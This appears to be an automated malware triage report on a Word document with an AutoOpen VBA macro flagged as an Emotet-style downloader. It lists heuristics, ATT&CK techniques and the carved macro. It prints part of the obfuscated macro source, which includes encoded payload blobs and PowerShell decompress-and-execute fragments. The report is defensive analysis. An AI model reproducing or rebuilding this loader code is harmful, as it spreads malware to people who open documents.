Verdict: MALICIOUS
Risk Score: 224

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The file contains a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. Heuristics confirm the presence of VBA macros and a CreateObject call, commonly used to instantiate objects for malicious purposes. The ClamAV detection and the presence of a VBA macro named 'macros.bas' strongly suggest this is a downloader for a second-stage payload.
Heuristics (8)

- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44366 bytes |

SHA-256: e4d851b46242e6a9cfe137c85bebef15ebd3d14369de44aa8af6d7f8626ba63a

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 8 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "rzasRsGmanKPSm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "rJAJTdjKqwnb"
Function YaLpPCYozhSdr()
On Error Resume Next
Select Case iDLAiL
Case 6565
mXzqtq = 98736
SODiVY = Sqr(91141)
Case 36504
UarMWz = CSng(ELjGN)
GGSfi = ZMDVW
End Select
zIVXa = rGrlAC("jqwD4T6aOfEG/bPqfiZUPesTqXyOOj9Wn03CLcl5w7UY/Cf+aw0pzTKB/D3zZ", 5, 53)
Select Case YGsEb
Case 20753
sYKlL = 53585
apmhJ = Sqr(86767)
Case 73203
IzMqp = CSng(tPQFUD)
qQzkVz = cwUGD
End Select
Select Case iwnUv
Case 42678
oqGWB = 94143
VWJab = Sqr(9279)
Case 6738
zDFjA = CSng(BPnbI)
JZjNK = fdvsaT
End Select
KZpRFBVh = rGrlAC("AaSCIi ) }).REaDtoEnD() | .( $EnV:comSPEc[4,15,25]-jOIn'')z.1w46FR", 2, 57)
Select Case QdPqQz
Case 74230
HzjPPV = 8037
aSvtos = Sqr(92404)
Case 75418
QhZabG = CSng(mmjamZ)
dVIBZ = wvYbqU
End Select
Select Case OwVpu
Case 54368
VBtnC = 74086
JdhUh = Sqr(80562)
Case 11598
tvTkEZ = CSng(MzwEG)
cMVuUf = NwmKVG
End Select
WRTsvlDwCK = rGrlAC("qlODk9GyfTd+MkOxnn2fj0dHyaxkV8kSfjk8k4y+Pfp+M0ycZpmo6zk9HR6Oi43TzdFxdfHx4/vX8sfm6qp6X76a2GFM", 3, 84)
Select Case wDVojz
Case 39998
aWJXb = 14605
uqwfWj = Sqr(33777)
Case 23495
NKUjzJ = CSng(PwoRI)
IUHSZl = lzEiYB
End Select
Select Case BDOiA
Case 66991
anLcwr = 77281
OKAPH = Sqr(69777)
Case 74358
naWbmw = CSng(QVWOQ)
iBMzWE = mBKTf
End Select
MChVdoJjuuA = rGrlAC("2vzvrG+OL/r7yA3FfoZ7O4kA+duSHnUc+plg74R9r7JuoXgn8hV1vec2Fmx1w5ulX1TKvFfJb2H03ytP05Rzye233rTxxvwm9", 5, 90)
Select Case SADBNZ
Case 29223
bIiGI = 56368
vGadYQ = Sqr(70475)
Case 17083
QlfcBl = CSng(CwwiI)
UJoAW = tisNb
End Select
Select Case jBEmD
Case 68400
JkUMwp = 41119
lBiNJG = Sqr(92024)
Case 94113
kVdFWF = CSng(rpOTa)
VEjIa = fPMXiN
End Select
duOipjRF = rGrlAC("Aii2tLXjnyZF6oTdJr9paeeoo6oD/V/0EPqH3CdS6dy4eMO+AT/Bv8C80n97Nhvja+DzrR2PoN+ttTJRjhcyR71eKnzTvwO1BnooOFy0E3P+KkHyCPjKMhP9ul833/myG8iv6fS32vyXv27Z3/HXMB7UY+mJX8bO09dxnwRxAfoLXDD/Zw/WuKAuE73uroA72/EnwP", 5, 192)
Select Case BQzGO
Case 76897
PBiGo = 74035
GVJbCB = Sqr(62194)
Case 61963
dAfBRZ = CSng(wurRE)
tiAfVq = WdUoP
End Select
Select Case zJiwp
Case 43154
hHYwb = 26113
hGzKaj = Sqr(8372)
Case 5838
torhEV = CSng(rwVPi)
iktmG = RSCSvP
End Select
sJNUvMYdXt = rGrlAC("J5BF4N0e/69kHzY+gucnwY/gsX/GA+GDdlvu5g3MG8juhPphdJ71ekhecv57Z5zTntNLJVnMLcDL0F2/PTPfvxKdX/QD9UHpqfnr10zXjWdT7eYhxl/InyL+gflmrP8J/6D71olbf8pxTXuk++xTO96pHAsNa@u", 2, 152)
Select Case qTRPL
Case 96375
jlIwoR = 21728
hwGzN = Sqr(44506)
Case 53299
QocQl = CSng(qVvRE)
nZiKRk = sbuzoc
End Select
Select Case jHUvCu
Case 71058
iQNrPu = 93030
irtlOt = Sqr(46288)
Case 64506
kzoLlT = CSng(hZuhwW)
muWAT = AaJNkb
End Select
dXqvMfUkv = rGrlAC("0Ap6/Do+NflP+fx5Xz0e3R8OPrj1z8fH+6Kb2ny/Y39XpXFtyz//uZge3D0Hw==' ) ,[io.COMPreSsion.CoMpReSsIon3LOj", 4, 92)
Select Case tdQpj
Case 74117
Szwms = 94640
KpAOz = Sqr(14914)
Case 41056
qrtEA = CSn
```

... (truncated)